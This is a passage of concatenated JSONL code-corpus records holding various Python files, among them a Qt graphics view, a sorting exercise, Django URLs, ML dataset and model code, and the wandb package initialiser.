self.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n # self.setOptimizationFlags(QGraphicsView.DontSavePainterState)\n self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)\n # self.setViewportUpdateMode(QGraphicsView.SmartViewportUpdate)\n\n self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)\n\n # self.setCacheMode(QGraphicsView.CacheBackground)\n\n\n def dotsPerMeter(self):\n return self.physicalDpiX() / 0.0254\n\n def drawBackground(self, painter : QPainter, r : QRectF):\n QGraphicsView.drawBackground(self, painter, r)\n\n\n\nclass TabletViewHead(TabletView):\n def __init__(self, parent : QWidget = None):\n TabletView.__init__(self, parent)\n\n self.scale(self.dotsPerMeter(), self.dotsPerMeter())\n\n @Slot(QTransform)\n def onTransformed(self, t):\n \"\"\"\n Sync tranformations with the body.\n \"\"\"\n myTransform = self.transform()\n\n myTransform.translate(-myTransform.m13() + t.m12(), 0.0)\n myTransform.scale(t.m11() / myTransform.m11(), 1.0)\n\n self.setTransform(myTransform)\n\n\n\nclass TabletViewBody(TabletView):\n\n transformed = Signal(QTransform)\n\n def __init__(self, parent : QWidget = None):\n TabletView.__init__(self, parent)\n\n self.scale(self.dotsPerMeter(), self.dotsPerMeter() / 500.0)\n # print(\"table transform\", self.transform())\n\n self._scale_multiplier = 1.2\n\n self.viewport().setAcceptDrops(True)\n\n self.viewport().installEventFilter(self)\n\n\n def wheelEvent(self, event : QWheelEvent):\n\n delta = event.angleDelta();\n if delta.y() == 0:\n event.ignore()\n return\n d = delta.y() / math.fabs(delta.y())\n\n if event.modifiers() & Qt.ControlModifier or \\\n event.modifiers() & Qt.ShiftModifier:\n\n if d > 0.0:\n self._scaleUp(event);\n else:\n self._scaleDown(event);\n\n else:\n QGraphicsView.wheelEvent(self, event)\n\n def eventFilter(self, obj, event : QEvent):\n if event.type() == QEvent.MouseButtonPress:\n # Enter here any button you like\n if event.button() == Qt.MiddleButton:\n # temporarly enable dragging mode\n self.setDragMode(QGraphicsView.ScrollHandDrag)\n # emit a left mouse click (the default button for the drag mode)\n pressEvent = QMouseEvent(QEvent.GraphicsSceneMousePress,\n event.pos(),\n Qt.LeftButton,\n Qt.LeftButton,\n Qt.NoModifier)\n\n self.mousePressEvent(pressEvent)\n elif event.type() == QEvent.MouseButtonRelease:\n # # disable drag mode if dragging is finished\n self.setDragMode(QGraphicsView.NoDrag)\n\n return False\n else:\n return QGraphicsView.eventFilter(self, obj, event)\n\n\n def _scaleUp(self, event):\n\n x_factor = self._scale_multiplier\n\n if event.modifiers() & Qt.ShiftModifier:\n x_factor = 1.0\n\n self.scale(x_factor, self._scale_multiplier)\n\n t = self.transform()\n\n self.transformed.emit(t)\n\n def _scaleDown(self, event):\n\n x_factor = 1.0 / self._scale_multiplier\n\n if event.modifiers() & Qt.ShiftModifier:\n x_factor = 1.0\n\n self.scale(x_factor, 1.0 / self._scale_multiplier)\n\n t = self.transform()\n self.transformed.emit(t)\n","repo_name":"iGeophysix/gamma","sub_path":"components/tablet/gui/TabletView.py","file_name":"TabletView.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24421012557","text":"def none(n):\n su=0\n for i in range(1,n):\n if(n%i==0):\n su+=i\n return su\na=int(input())\nif(none(a)==a):\n print(\"True\")\nelse:\n print(\"False\")","repo_name":"Navya-relli/codemind-python","sub_path":"Perfect_Number.py","file_name":"Perfect_Number.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74900848427","text":"# for i = 1 to n-1\n# j = i\n# while j > 0 and A[j] < A[j-1]\n# swap A[j] with A[j-1]\n# j = j-1\n\nimport random\nimport copy\n\ndef sort(seq):\n temp = 1\n # BEGIN (write your solution here)\n for x in range(1, len(seq)):\n b = x\n while b > 0 and seq[b] < seq[b-1]:\n temp = seq[b]\n seq[b] = seq[b-1]\n seq[b-1] = temp\n b = b - 1\n # END\n\n return seq\n\n\n# Generate random sequence\nsorted_seq = [x for x in range(10) if random.choice([True, False])]\n\nunsorted_seq = copy.copy(sorted_seq)\nrandom.shuffle(unsorted_seq)\n\nassert sorted_seq == sort(unsorted_seq)\n","repo_name":"basedalexander/data-structures-and-algorithms-javascript","sub_path":"algorithms/sorting/basic/py/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41179728790","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('log_out/', views.log_out, name=\"log_out\"),\n path('home/', views.home, name='home'),\n path('log_in/', views.log_in, name=\"log_in\"),\n path('profile/', views.profile, name='profile'),\n path('edit_profile/',views.edit_profile, name = 'edit_profile'),\n path('update_location/',views.update_location, name = 'update_location'),\n path('primper/',views.primper, name='primper')\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"rjrobins16/passion2","sub_path":"PrimpApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30482424522","text":"import numpy as np\nimport sys\nfrom MLModel import MLModel\nfrom Plots import roc, prc\n\nfrom sklearn import svm\nfrom sklearn.multiclass import OneVsRestClassifier\n\nclass SVCModel(MLModel):\n def __init__(self, data_file):\n super().__init__(data_file, \"results_svc.txt\", 0.5)\n\n def model_build(self):\n return OneVsRestClassifier(svm.SVC(kernel='linear', probability=True))\n\n def model_run(self, model):\n y_score = model.fit(self.X_train, self.y_train).decision_function(self.X_test)\n accu_train = np.sum(model.predict(self.X_train) == self.y_train) / self.y_train.size\n accu_test = np.sum(y_score == self.y_test) / self.y_test.size\n\n self.results.write(\"Model Results\\n\")\n self.results.write(\"Accuracy on Train: \" + str(accu_train) + \"\\n\")\n self.results.write(\"Accuracy on Test: \" + str(accu_test) + \"\\n\")\n\n return model, y_score\n\n def model_probs(self, model):\n if not model:\n model = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True))\n model.fit(self.X_train, self.y_train).decision_function(self.X_test)\n predictions = model.predict_proba(self.X_test)\n return predictions\n\n def kfold_run(self):\n model = self.model_build()\n super().kfold_run(model)\n\nif __name__ == \"__main__\":\n svc = SVCModel(sys.argv[1])\n svc_model = svc.model_build()\n model, y_score = svc.model_run(svc_model)\n svc.kfold_run()\n probs = svc.model_probs(model=model)\n svc.roc(probs, \"SVC ROC Graph\", \"svc_roc.png\")\n","repo_name":"kindalime/Gerstein-Lab-Breakseq","sub_path":"docker/models/scripts/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42075006360","text":"import ksc\nfrom ksc.tracing.functions import core, math, nn\n\n\n@ksc.trace\ndef dense(x, weights):\n W, b = weights\n return math.broadcast_add(math.dot(x, math.transpose(W)), b)\n\n\n@ksc.trace\ndef conv_block(x, weights, strides):\n (\n conv_1_weights,\n norm_1_weights,\n conv_2_weights,\n norm_2_weights,\n conv_3_weights,\n norm_3_weights,\n ) = weights\n h = nn.conv_2d_no_bias(x, conv_1_weights, (1, 1), strides)\n h = nn.batch_norm_2d(h, norm_1_weights)\n h = nn.relu(h)\n h = nn.conv_2d_no_bias(h, conv_2_weights, (3, 3), (1, 1))\n h = nn.batch_norm_2d(h, norm_2_weights)\n h = nn.relu(h)\n h = nn.conv_2d_no_bias(h, conv_3_weights, (1, 1), (1, 1))\n return nn.batch_norm_2d(h, norm_3_weights)\n\n\n@ksc.trace\ndef conv_residual_block(x, weights, strides):\n (conv_block_weights, shortcut_conv_weights, shortcut_norm_weights) = weights\n main = conv_block(x, conv_block_weights, strides)\n h = nn.conv_2d_no_bias(x, shortcut_conv_weights, (1, 1), strides)\n shortcut = nn.batch_norm_2d(h, shortcut_norm_weights)\n return nn.relu(main + shortcut)\n\n\n@ksc.trace\ndef identity_residual_block(x, weights):\n main = conv_block(x, weights, (1, 1))\n return nn.relu(main + x)\n\n\n@ksc.trace\ndef resnet(x, weights):\n (\n normalization_weights,\n conv_weights,\n batch_norm_weights,\n residual_blocks_weights,\n final_dense_weights,\n ) = weights\n h = nn.normalize_2d(x, normalization_weights)\n h = nn.conv_2d_no_bias(h, conv_weights, (7, 7), (2, 2))\n h = nn.batch_norm_2d(h, batch_norm_weights)\n h = nn.relu(h)\n h = nn.max_pool(h, (3, 3), (2, 2), padding=\"SAME\")\n for i, blocks_weights in enumerate(residual_blocks_weights):\n for j, weights in enumerate(blocks_weights):\n if j == 0:\n strides = (1, 1) if i == 0 else (2, 2)\n h = conv_residual_block(h, weights, strides)\n else:\n h = identity_residual_block(h, weights)\n h = nn.avg_pool(h, (7, 7), (1, 1))\n h = core.flatten(h)\n h = dense(h, final_dense_weights)\n return nn.log_softmax(h)\n","repo_name":"microsoft/knossos-ksc","sub_path":"examples/dl-resnet/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"71926257067","text":"import numpy as np\n\nimport torch\nimport evaluate\nfrom itertools import chain\nfrom typing import Optional, Tuple, Dict, List, Any, Type\nfrom transformers import AutoTokenizer, AutoImageProcessor\nfrom transformers.data.data_collator import default_data_collator\nfrom transformers.tokenization_utils import PreTrainedTokenizerBase\nfrom transformers.image_processing_utils import BaseImageProcessor\nfrom torchvision.transforms import (\n CenterCrop,\n Compose,\n Normalize,\n RandomHorizontalFlip,\n RandomResizedCrop,\n Resize,\n ToTensor,\n)\nfrom datasets import Dataset, load_dataset\n\nfrom oobleck.module.model import lang_models, image_models\n\n\nclass OobleckDataset:\n \"\"\"\n Load datasets from Hugging Face Hub (https://huggingface.co/datasets)\n and do preprocessing.\n \"\"\"\n\n def __init__(\n self,\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str] = None,\n max_seq_length: Optional[int] = None,\n ):\n # TODO: replace it with evaluate.load(\"accuracy\")\n metric = evaluate.load(\"accuracy\")\n\n if any(lang_model in model_name for lang_model in lang_models):\n self.tokenizer, self.dataset = OobleckDataset.create_language_dataset(\n model_name, dataset_path, dataset_name, max_seq_length\n )\n\n def compute_metrics(eval_preds):\n preds, labels = eval_preds\n # preds have the same shape as the labels, after the argmax(-1) has been calculated\n # by preprocess_logits_for_metrics but we need to shift the labels\n labels = labels[:, 1:].reshape(-1)\n preds = preds[:, :-1].reshape(-1)\n return metric.compute(predictions=preds, references=labels)\n\n self.compute_metrics = compute_metrics\n\n self.data_collator = default_data_collator\n elif any(image_model in model_name for image_model in image_models):\n self.tokenizer, self.dataset = OobleckDataset.create_image_dataset(\n model_name, dataset_path, dataset_name\n )\n\n def compute_metrics(p):\n return metric.compute(\n predictions=np.argmax(p.predictions, axis=1), references=p.label_ids\n )\n\n self.compute_metrics = compute_metrics\n\n def collate_fn(examples):\n pixel_values = torch.stack(\n [example[\"pixel_values\"] for example in examples]\n )\n labels = torch.tensor([example[\"labels\"] for example in examples])\n return {\"pixel_values\": pixel_values, \"labels\": labels}\n\n self.data_collator = collate_fn\n\n else:\n self.dataset = None\n\n assert (\n self.dataset\n ), f\"Dataset it not initialized because given model {model_name} is not supported yet.\"\n\n trace_input = next(iter(self.dataset[\"train\"]))\n self.sample = self.data_collator([trace_input])\n\n @staticmethod\n def create_image_dataset(\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str],\n ) -> Tuple[Type[BaseImageProcessor], Dataset]:\n dataset = load_dataset(dataset_path, dataset_name, task=\"image-classification\")\n\n # If we don't have a validation split, split off a percentage of train as validation.\n if \"validation\" not in dataset.keys():\n split = dataset[\"train\"].train_test_split(0.05)\n dataset[\"train\"] = split[\"train\"]\n dataset[\"validation\"] = split[\"test\"]\n\n image_processor = AutoImageProcessor.from_pretrained(model_name)\n size = (\n image_processor.size[\"shortest_edge\"]\n if \"shortest_edge\" in image_processor.size\n else (image_processor.size[\"height\"], image_processor.size[\"width\"])\n )\n\n normalize = Normalize(\n mean=image_processor.image_mean, std=image_processor.image_std\n )\n _train_transforms = Compose(\n [\n RandomResizedCrop(size),\n RandomHorizontalFlip(),\n ToTensor(),\n normalize,\n ]\n )\n _val_transforms = Compose(\n [\n Resize(size),\n CenterCrop(size),\n ToTensor(),\n normalize,\n ]\n )\n\n def train_transforms(example_batch):\n \"\"\"Apply _train_transforms across a batch.\"\"\"\n example_batch[\"pixel_values\"] = [\n _train_transforms(pil_img.convert(\"RGB\"))\n for pil_img in example_batch[\"image\"]\n ]\n return example_batch\n\n def val_transforms(example_batch):\n \"\"\"Apply _val_transforms across a batch.\"\"\"\n example_batch[\"pixel_values\"] = [\n _val_transforms(pil_img.convert(\"RGB\"))\n for pil_img in example_batch[\"image\"]\n ]\n return example_batch\n\n dataset[\"train\"].set_transform(train_transforms)\n dataset[\"validation\"].set_transform(val_transforms)\n\n return image_processor, dataset\n\n @staticmethod\n def create_language_dataset(\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str],\n max_seq_length: Optional[int] = None,\n ) -> Tuple[Type[PreTrainedTokenizerBase], Dataset]:\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n\n raw_dataset = load_dataset(dataset_path, dataset_name)\n if \"validation\" not in raw_dataset.keys():\n raw_dataset[\"validation\"] = load_dataset(\n dataset_path,\n dataset_name,\n split=f\"train[:5%]\",\n )\n\n column_names = list(raw_dataset[\"train\"].features)\n text_column_name = \"text\" if \"text\" in column_names else column_names[0]\n\n if max_seq_length is None:\n max_seq_length = tokenizer.model_max_length\n\n def tokenize_function(examples):\n return tokenizer(examples[text_column_name])\n\n tokenized_datasets = raw_dataset.map(\n tokenize_function,\n batched=True,\n remove_columns=column_names,\n load_from_cache_file=True,\n )\n\n def group_texts(examples):\n # Concatenate all texts.\n concatenated_examples = {\n k: list(chain(*examples[k])) for k in examples.keys()\n }\n total_length = len(concatenated_examples[list(examples.keys())[0]])\n # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can\n # customize this part to your needs.\n if total_length >= max_seq_length:\n total_length = (total_length // max_seq_length) * max_seq_length\n # Split by chunks of max_len.\n result = {\n k: [\n t[i : i + max_seq_length]\n for i in range(0, total_length, max_seq_length)\n ]\n for k, t in concatenated_examples.items()\n }\n result[\"labels\"] = result[\"input_ids\"].copy()\n return result\n\n tokenized_datasets = tokenized_datasets.map(\n group_texts, batched=True, load_from_cache_file=True\n )\n\n return tokenizer, tokenized_datasets\n","repo_name":"SymbioticLab/Oobleck","sub_path":"oobleck/execution/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"10653700249","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nfrom preprocessing import *\nimport numpy as np\nimport seaborn as sns\nfrom skimage import data, io, filters\nimport matplotlib\nmyfont = matplotlib.font_manager.FontProperties(fname=\"/usr/share/fonts/Consolas+YaHei+hybrid.ttf\", size=12)\nif __name__ == '__main__':\n #\n df = process_data(\"数据集1/*/*/*.dcm\")\n # df = df[df['phase'] == 'arterial phase']\n idxs = []\n array = []\n # count = 0\n for idx, sample in enumerate(df.iterrows()):\n # dcm = itk_read(sample[1]['path_dcm'])\n # img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n # if img.any():\n # count += 1\n # idxs.append(idx)\n dcm = itk_read_(sample[1]['path_dcm']).astype('int16')\n array.append(dcm)\n # array.append(dcm)\n # plt.imshow(filters.sobel(dcm/2500))\n # plt.show()\n # array.append(dcm)\n tmp = np.stack(array, 0) # tmp = np.concatenate(array, None)\n # sns.distplot(tmp.tolist())\n # sns.heatmap(tmp.mean(0))\n plt.hist2d(tmp.sum(0))\n plt.xlabel('HU', fontproperties=myfont)\n # plt.title('标记区域hu值分布', fontproperties=myfont)\n plt.savefig('HU无坐标.svg', tig=10, format='svg')\n\n plt.hist(tmp)\n plt.show()\n sns.distplot(np.concatenate(array, None))\n # print(count)\n\n\n\n # df = process_data(\"数据集1/*/*/*.dcm\")\n # # idxs = []\n # array = []\n # for idx, sample in enumerate(df.iterrows()):\n # img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n # array.append(img)\n # temp = np.concatenate(array, None)\n # plt.hist(temp)\n # plt.show()\n # temp //= 255\n # print((temp.size-temp.sum())/temp.sum())\n #\n # df = process_data(\"数据集1/*/*/*.dcm\")\n # idxs = []\n # array = []\n # for idx, sample in enumerate(df.iterrows()):\n # img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n # if img.any():\n # # idxs.append(idx)\n # dcm = itk_read(sample[1]['path_dcm'])\n # # plt.imshow(np.logical_and(dcm>-50, dcm<100))\n # # plt.imshow(dcm, plt.cm.bone)\n # plt.show()\n # array.append(dcm[np.nonzero(dcm * img)] )\n # plt.hist(np.concatenate(array, None))\n # plt.show()\n # pass","repo_name":"zhanglei1172/TaiDi","sub_path":"datasets/prepare_image.py","file_name":"prepare_image.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31708760486","text":"# -*- coding: utf-8 -*-\n#@Time :2019/8/18 0:09\n#@Author :XiaoMa\nimport tensorflow as tf\nimport numpy as np\n\"\"\"\ntensorflow张量例子\n\"\"\"\ngraph=tf.Graph()\nsession=tf.InteractiveSession(graph=graph)\n\nx=tf.placeholder(dtype=tf.float32,shape=[1,10],name='x')\nW=tf.Variable(tf.random_uniform(shape=[10,5],minval=-0.1,maxval=0.1,dtype=tf.float32),name='w')\nb=tf.Variable(tf.zeros(shape=[5],dtype=tf.float32),name='b')\n\nh=tf.nn.sigmoid(tf.matmul(x,W)+b)\n\ntf.global_variables_initializer().run()\nsession.run(h,feed_dict={x:np.random.rand(1,10)})\nsession.close()\n\n\n\n","repo_name":"FreeFlyXiaoMa/RNNLSTM","sub_path":"tensorflow_demo/demo14.py","file_name":"demo14.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43044920990","text":"from flask_restx import Resource\n\nfrom globals import get_connection\n\n\n# EditPilot.vue\n# GET /rfid\nclass RfidAvailable(Resource):\n def get(self):\n '''available RFID tags'''\n connection = get_connection(\"database_server.db\")\n cursor = connection.cursor()\n\n return_dict = {\n 'rfid_list': []\n }\n for row in cursor.execute(\n 'SELECT RFID_Code FROM RFID_Ausweis WHERE RFID_Code NOT IN (SELECT RFID_Code FROM Pilot WHERE RFID_Code NOT NULL)'):\n rfid_tag = hex(row[0])\n return_dict['rfid_list'].append(rfid_tag)\n connection.close()\n return return_dict\n","repo_name":"christiandettlaff/E2-Anwesenheitserfassung-fuer-Modellflugplatz","sub_path":"src/webserver/backend/rfid_available.py","file_name":"rfid_available.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"18957310517","text":"import math\n\n\nclass Solution(object):\n def minAbsoluteSumDiff(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: int\n \"\"\"\n length = len(nums1)\n i = 0\n max_dis, index1 = 0, -1\n result_map = {}\n while i < length:\n res = abs(nums1[i] - nums2[i])\n if res > max_dis:\n max_dis = res\n index1 = i\n result_map[i] = res\n i += 1\n i, temp = 0, 1000000000\n index2 = -1\n while i < length:\n if i != index1:\n if abs(nums1[i] - nums2[index1]) < temp:\n temp = abs(nums1[i] - nums2[index1])\n index2 = i\n i += 1\n result_map[index1] = temp\n nums1[index1] = nums1[index2]\n print(nums1)\n print(nums2)\n print(sum(result_map.values()))\n return sum(result_map.values()) % (math.pow(10, 9) + 7)\n\n\n# Solution().minAbsoluteSumDiff([1, 7, 5], [2, 3, 5])\n# Solution().minAbsoluteSumDiff([2, 4, 6, 8, 10], [2, 4, 6, 8, 10])\n# Solution().minAbsoluteSumDiff([1, 10, 4, 4, 2, 7], [9, 3, 5, 1, 7, 4])\nSolution().minAbsoluteSumDiff([1, 28, 21], [9, 21, 20])\n","repo_name":"bobowang2017/python_study","sub_path":"algorithm/leetcode/1/1818. 绝对差值和.py","file_name":"1818. 绝对差值和.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395816471","text":"\"\"\"Use wandb to track machine learning work.\n\nThe most commonly used functions/objects are:\n - wandb.init — initialize a new run at the top of your training script\n - wandb.config — track hyperparameters and metadata\n - wandb.log — log metrics and media over time within your training loop\n\nFor guides and examples, see https://docs.wandb.ai.\n\nFor scripts and interactive notebooks, see https://github.com/wandb/examples.\n\nFor reference documentation, see https://docs.wandb.com/ref/python.\n\"\"\"\n__version__ = \"0.15.13.dev1\"\n_minimum_nexus_version = \"0.16.0b3\"\n\n# Used with pypi checks and other messages related to pip\n_wandb_module = \"wandb\"\n\nfrom typing import Optional\n\nfrom wandb.errors import Error\n\n# This needs to be early as other modules call it.\nfrom wandb.errors.term import termsetup, termlog, termerror, termwarn\n\nfrom wandb import sdk as wandb_sdk\n\nimport wandb\n\nwandb.wandb_lib = wandb_sdk.lib\n\ninit = wandb_sdk.init\nsetup = wandb_sdk.setup\n_attach = wandb_sdk._attach\n_teardown = wandb_sdk.teardown\nwatch = wandb_sdk.watch\nunwatch = wandb_sdk.unwatch\nfinish = wandb_sdk.finish\njoin = finish\nlogin = wandb_sdk.login\nhelper = wandb_sdk.helper\nsweep = wandb_sdk.sweep\ncontroller = wandb_sdk.controller\nrequire = wandb_sdk.require\nArtifact = wandb_sdk.Artifact\nAlertLevel = wandb_sdk.AlertLevel\nSettings = wandb_sdk.Settings\nConfig = wandb_sdk.Config\n\nfrom wandb.apis import InternalApi, PublicApi\nfrom wandb.errors import CommError, UsageError\n\n_preinit = wandb.wandb_lib.preinit\n_lazyloader = wandb.wandb_lib.lazyloader\n\n# Call import module hook to set up any needed require hooks\nwandb.sdk.wandb_require._import_module_hook()\n\nfrom wandb import wandb_torch\n\n# Move this (keras.__init__ expects it at top level)\nfrom wandb.data_types import Graph\nfrom wandb.data_types import Image\nfrom wandb.data_types import Plotly\n\n# from wandb.data_types import Bokeh # keeping out of top level for now since Bokeh plots have poor UI\nfrom wandb.data_types import Video\nfrom wandb.data_types import Audio\nfrom wandb.data_types import Table\nfrom wandb.data_types import Html\nfrom wandb.data_types import Object3D\nfrom wandb.data_types import Molecule\nfrom wandb.data_types import Histogram\nfrom wandb.data_types import Classes\nfrom wandb.data_types import JoinedTable\n\nfrom wandb.wandb_agent import agent\n\n# from wandb.core import *\nfrom wandb.viz import visualize\nfrom wandb import plot\nfrom wandb import plots # deprecating this\nfrom wandb.integration.sagemaker import sagemaker_auth\nfrom wandb.sdk.internal import profiler\n\n# Artifact import types\nfrom wandb.sdk.artifacts.artifact_ttl import ArtifactTTL\n\n# Used to make sure we don't use some code in the incorrect process context\n_IS_INTERNAL_PROCESS = False\n\n\ndef _set_internal_process(disable=False):\n global _IS_INTERNAL_PROCESS\n if _IS_INTERNAL_PROCESS is None:\n return\n if disable:\n _IS_INTERNAL_PROCESS = None\n return\n _IS_INTERNAL_PROCESS = True\n\n\ndef _assert_is_internal_process():\n if _IS_INTERNAL_PROCESS is None:\n return\n assert _IS_INTERNAL_PROCESS\n\n\ndef _assert_is_user_process():\n if _IS_INTERNAL_PROCESS is None:\n return\n assert not _IS_INTERNAL_PROCESS\n\n\n# toplevel:\n# save()\n# restore()\n# login()\n# sweep()\n# agent()\n\n# globals\nApi = PublicApi\napi = InternalApi()\nrun: Optional[\"wandb_sdk.wandb_run.Run\"] = None\nconfig = _preinit.PreInitObject(\"wandb.config\", wandb_sdk.wandb_config.Config)\nsummary = _preinit.PreInitObject(\"wandb.summary\", wandb_sdk.wandb_summary.Summary)\nlog = _preinit.PreInitCallable(\"wandb.log\", wandb_sdk.wandb_run.Run.log)\nsave = _preinit.PreInitCallable(\"wandb.save\", wandb_sdk.wandb_run.Run.save)\nrestore = wandb_sdk.wandb_run.restore\nuse_artifact = _preinit.PreInitCallable(\n \"wandb.use_artifact\", wandb_sdk.wandb_run.Run.use_artifact\n)\nlog_artifact = _preinit.PreInitCallable(\n \"wandb.log_artifact\", wandb_sdk.wandb_run.Run.log_artifact\n)\nlog_model = _preinit.PreInitCallable(\n \"wandb.log_model\", wandb_sdk.wandb_run.Run.log_model\n)\nuse_model = _preinit.PreInitCallable(\n \"wandb.use_model\", wandb_sdk.wandb_run.Run.use_model\n)\nlink_model = _preinit.PreInitCallable(\n \"wandb.link_model\", wandb_sdk.wandb_run.Run.link_model\n)\ndefine_metric = _preinit.PreInitCallable(\n \"wandb.define_metric\", wandb_sdk.wandb_run.Run.define_metric\n)\n\nmark_preempting = _preinit.PreInitCallable(\n \"wandb.mark_preempting\", wandb_sdk.wandb_run.Run.mark_preempting\n)\n\nplot_table = _preinit.PreInitCallable(\n \"wandb.plot_table\", wandb_sdk.wandb_run.Run.plot_table\n)\nalert = _preinit.PreInitCallable(\"wandb.alert\", wandb_sdk.wandb_run.Run.alert)\n\n# record of patched libraries\npatched = {\"tensorboard\": [], \"keras\": [], \"gym\": []}\n\nkeras = _lazyloader.LazyLoader(\"wandb.keras\", globals(), \"wandb.integration.keras\")\nsklearn = _lazyloader.LazyLoader(\"wandb.sklearn\", globals(), \"wandb.sklearn\")\ntensorflow = _lazyloader.LazyLoader(\n \"wandb.tensorflow\", globals(), \"wandb.integration.tensorflow\"\n)\nxgboost = _lazyloader.LazyLoader(\n \"wandb.xgboost\", globals(), \"wandb.integration.xgboost\"\n)\ncatboost = _lazyloader.LazyLoader(\n \"wandb.catboost\", globals(), \"wandb.integration.catboost\"\n)\ntensorboard = _lazyloader.LazyLoader(\n \"wandb.tensorboard\", globals(), \"wandb.integration.tensorboard\"\n)\ngym = _lazyloader.LazyLoader(\"wandb.gym\", globals(), \"wandb.integration.gym\")\nlightgbm = _lazyloader.LazyLoader(\n \"wandb.lightgbm\", globals(), \"wandb.integration.lightgbm\"\n)\ndocker = _lazyloader.LazyLoader(\"wandb.docker\", globals(), \"wandb.docker\")\njupyter = _lazyloader.LazyLoader(\"wandb.jupyter\", globals(), \"wandb.jupyter\")\nsacred = _lazyloader.LazyLoader(\"wandb.sacred\", globals(), \"wandb.integration.sacred\")\n\n\ndef ensure_configured():\n global api\n api = InternalApi()\n\n\ndef set_trace():\n import pdb # TODO: support other debuggers\n\n # frame = sys._getframe().f_back\n pdb.set_trace() # TODO: pass the parent stack...\n\n\ndef load_ipython_extension(ipython):\n ipython.register_magics(wandb.jupyter.WandBMagics)\n\n\nif wandb_sdk.lib.ipython.in_notebook():\n from IPython import get_ipython\n\n load_ipython_extension(get_ipython())\n\n\nfrom .analytics import Sentry as _Sentry\n\n_sentry = _Sentry()\n_sentry.setup()\n\n\n# print a warning if running py 3.6 saying that it will be deprecated in the 0.16.0 release\ntry:\n import sys\n\n if sys.version_info[0] == 3 and sys.version_info[1] == 6:\n termwarn(\n \"Support for Python 3.6 will be discontinued \"\n \"in the upcoming 0.16.0 release of wandb. \"\n \"We recommend upgrading to Python 3.7 or a later version.\",\n repeat=False,\n )\nexcept Exception:\n pass\n\n\n__all__ = (\n \"__version__\",\n \"init\",\n \"setup\",\n \"save\",\n \"sweep\",\n \"controller\",\n \"agent\",\n \"config\",\n \"log\",\n \"summary\",\n \"join\",\n \"Api\",\n \"Graph\",\n \"Image\",\n \"Plotly\",\n \"Video\",\n \"Audio\",\n \"Table\",\n \"Html\",\n \"Object3D\",\n \"Molecule\",\n \"Histogram\",\n \"ArtifactTTL\",\n \"log_model\",\n \"use_model\",\n \"link_model\",\n)\n","repo_name":"wandb/wandb","sub_path":"wandb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"14648046276","text":"def addsq(x):\n '''\n Compute the square of an integer by adding abs(value) that many times.\n \n >>> addsq(4)\n 16\n >>> addsq(-2)\n 4\n >>> addsq(0)\n 0\n '''\n n = abs(x)\n sq = 0\n for i in range(n):\n sq += n\n return sq\n","repo_name":"heitorchang/reading-list","sub_path":"python-fluente/doctests/addsq.py","file_name":"addsq.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29179676287","text":"import email\nfrom itertools import product\nfrom random import choices\nfrom tabnanny import verbose\nfrom django.db import models\nimport datetime\nimport os\nfrom django.contrib.auth.models import User\nfrom PIL import Image\n\n\n\n# Create your models here.\n\ndef get_file_path(request,filename):\n orginal_filename = filename\n nowTime = datetime.datetime.now().strftime('%Y%m%d%H:%M:%S')\n filename = \"%s%s\" % (nowTime,orginal_filename)\n return os.path.join('uploads/',filename)\n\n\nclass Category(models.Model):\n name = models.CharField(max_length=150,null=False,blank=False)\n image = models.ImageField(upload_to=get_file_path,null 